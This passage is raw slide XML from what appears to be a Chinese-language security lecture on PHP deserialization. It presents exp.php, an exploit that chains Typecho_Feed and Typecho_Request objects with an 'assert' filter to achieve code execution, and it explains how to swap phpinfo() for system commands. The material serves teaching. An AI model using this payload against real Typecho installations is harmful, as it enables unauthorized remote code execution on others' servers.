                        <a:rPr lang="en-US" altLang="zh-CN" sz="2400" kern="100" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="FFFF00"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>$this-&gt;_</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2400" kern="100" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="FFFF00"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>params</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2400" kern="100" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="FFFF00"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>['</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2400" kern="100" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="FFFF00"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>screenName</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2400" kern="100" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="FFFF00"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>'] = '</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2400" kern="100" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="FFFF00"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>phpinfo</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2400" kern="100" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="FFFF00"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>()';</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr algn="just">
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2400" kern="100" dirty="0" smtClean="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>        </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2400" kern="100" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="FFFF00"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>$this-&gt;_filter[0] = 'assert';</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr algn="just">
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2400" kern="100" dirty="0" smtClean="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>    }</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr algn="just">
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2400" kern="100" dirty="0" smtClean="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>}    </a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="68580" marR="68580" marT="0" marB="0">
                    <a:solidFill>
                      <a:schemeClr val="tx1"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="289023297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DFE7A96A-D616-4A2E-8276-A1A8B22BAA17}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="884759" y="952029"/>
            <a:ext cx="11123116" cy="4616648"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>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上述代码中用到了</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assert()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="28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函数</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="28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p>
          <a:p>
            <a:pPr marL="1154113" lvl="1" indent="-514350">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="+mj-ea"/>
              <a:buAutoNum type="circleNumDbPlain"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" b="1"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如果</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assert()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"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函数</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" b="1"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参数是字符串，那么该字符串会被</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assert()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"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当做</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代码</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" b="1"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执行</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" b="1"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marL="1154113" lvl="1" indent="-514350">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="+mj-ea"/>
              <a:buAutoNum type="circleNumDbPlain"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="28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这</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一点和</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一句话木马常用的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="28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eval</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函数有相似之处</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="28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lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" b="1" dirty="0" err="1"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phpinfo</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便是我们执行的</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800" b="1"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代码</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="28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lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="28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如果</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想要执行系统命令，将</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="28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phpinfo</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替换为</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system(‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="28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ls</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即</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="28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可。注意</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最后有一个分号</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="28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484267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A2C57A0D-0707-41A0-98AF-CC5988247A48}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1172791" y="663997"/>
            <a:ext cx="10657184" cy="456551"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="86376" tIns="43188" rIns="86376" bIns="43188" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just"/>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根据上述思路，写出对应的利用代码：</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="5" name="表格 4"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1944327638"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1175098" y="1384077"/>
          <a:ext cx="10229028" cy="5120640"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" firstCol="1" bandRow="1">
                <a:tableStyleId>{5C22544A-7EE6-4342-B048-85BDC9FD1C3A}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="10229028"/>
              </a:tblGrid>
              <a:tr h="4032448">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="just">
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="2800" kern="100" dirty="0" smtClean="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>/*</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2800" kern="100" dirty="0" err="1" smtClean="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>exp.php</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2800" kern="100" dirty="0" smtClean="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>*/</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr algn="just">
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="2800" kern="100" dirty="0" smtClean="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>&lt;?</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2800" kern="100" dirty="0" err="1" smtClean="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>php</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="2800" kern="100" dirty="0" smtClean="0">
                        <a:effectLst/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr algn="just">
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="2800" kern="100" dirty="0" smtClean="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>class </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2800" kern="100" dirty="0" err="1" smtClean="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>Typecho_Feed</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="2800" kern="100" dirty="0" smtClean="0">
                        <a:effectLst/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr algn="just">
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="2800" kern="100" dirty="0" smtClean="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>{</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr algn="just">
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="2800" kern="100" dirty="0" smtClean="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>    private $item;</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr algn="just">
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="2800" kern="100" dirty="0" smtClean="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>	</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr algn="just">
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="2800" kern="100" dirty="0" smtClean="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>    public function __construct(){</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr algn="just">
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="2800" kern="100" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="FFFF00"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>        $this-&gt;item = array(</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr algn="just">
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="2800" kern="100" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="FFFF00"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>            'author' =&gt; new </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2800" kern="100" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="FFFF00"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>Typecho_Request</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2800" kern="100" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="FFFF00"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>(),</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr algn="just">
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="2800" kern="100" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="FFFF00"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>        );</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr algn="just">
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="2800" kern="100" dirty="0" smtClean="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>    }</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr algn="just">
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="2800" kern="100" dirty="0" smtClean="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>}</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="68580" marR="68580" marT="0" marB="0">
                    <a:solidFill>
                      <a:schemeClr val="tx1"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="383034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137259355"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1172791" y="591989"/>
          <a:ext cx="10229028" cy="5974080"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" firstCol="1" bandRow="1">
                <a:tableStyleId>{5C22544A-7EE6-4342-B048-85BDC9FD1C3A}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="10229028"/>
              </a:tblGrid>
              <a:tr h="4032448">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="just">
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="2800" kern="100" dirty="0" smtClean="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>class </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2800" kern="100" dirty="0" err="1" smtClean="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>Typecho_Request</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="2800" kern="100" dirty="0" smtClean="0">
                        <a:effectLst/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr algn="just">
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="2800" kern="100" dirty="0" smtClean="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>{</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr algn="just">
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="2800" kern="100" dirty="0" smtClean="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>    private $_</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2800" kern="100" dirty="0" err="1" smtClean="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>params</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2800" kern="100" dirty="0" smtClean="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t> = array();</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr algn="just">
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="2800" kern="100" dirty="0" smtClean="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>    private $_filter = array();</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr algn="just">
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="2800" kern="100" dirty="0" smtClean="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>    public function __construct(){</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr algn="just">
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="2800" kern="100" dirty="0" smtClean="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>        </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2800" kern="100" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="FFFF00"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>$this-&gt;_</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2800" kern="100" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="FFFF00"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>params</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2800" kern="100" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="FFFF00"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>['</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2800" kern="100" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="FFFF00"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>screenName</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2800" kern="100" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="FFFF00"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>'] = '</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2800" kern="100" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="FFFF00"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>phpinfo</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2800" kern="100" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="FFFF00"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>()';</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr algn="just">
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="2800" kern="100" dirty="0" smtClean="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>        </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2800" kern="100" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="FFFF00"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>$this-&gt;_filter[0] = 'assert';</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr algn="just">
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="2800" kern="100" dirty="0" smtClean="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>    }</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr algn="just">
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="2800" kern="100" dirty="0" smtClean="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>}</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr algn="just">
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="2800" kern="100" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="FFFF00"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>$</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2800" kern="100" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="FFFF00"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>exp</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2800" kern="100" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="FFFF00"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t> = array(</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr algn="just">
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="2800" kern="100" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="FFFF00"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>    'adapter' =&gt; new </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2800" kern="100" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="FFFF00"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>Typecho_Feed</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2800" kern="100" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="FFFF00"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>()</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr algn="just">
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="2800" kern="100" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="FFFF00"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>);</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr algn="just">
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="2800" kern="100" dirty="0" smtClean="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>echo base64_encode(serialize($</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2800" kern="100" dirty="0" err="1" smtClean="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>exp</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2800" kern="100" dirty="0" smtClean="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>));</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr algn="just">
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="2800" kern="100" dirty="0" smtClean="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>?&gt;</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="68580" marR="68580" marT="0" marB="0">
                    <a:solidFill>
                      <a:schemeClr val="tx1"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2810792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DFE7A96A-D616-4A2E-8276-A1A8B22BAA17}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="884759" y="663997"/>
            <a:ext cx="11123116" cy="1308628"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>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访问</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="28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exp.php</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便可以获得</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="28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payload</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0" smtClean="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通过</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get</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请求的方式传递给</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="28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typecho.php</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后，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="28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phpinfo</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成功执行。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="307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0823" y="2392189"/>
            <a:ext cx="9433048" cy="3994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380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blinds(horizontal)">
                                      <p:cBhvr>
                                        <p:cTn id="12"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xmlns="" id="{A222D30E-75DC-44A7-8490-4DA766F0D131}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1172791" y="3328293"/>
            <a:ext cx="10801200" cy="964880"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1890" b="1" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>下面便是一个在相同的框架中引入不同功能的示例代码，该代码可以从</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1890" b="1" dirty="0">
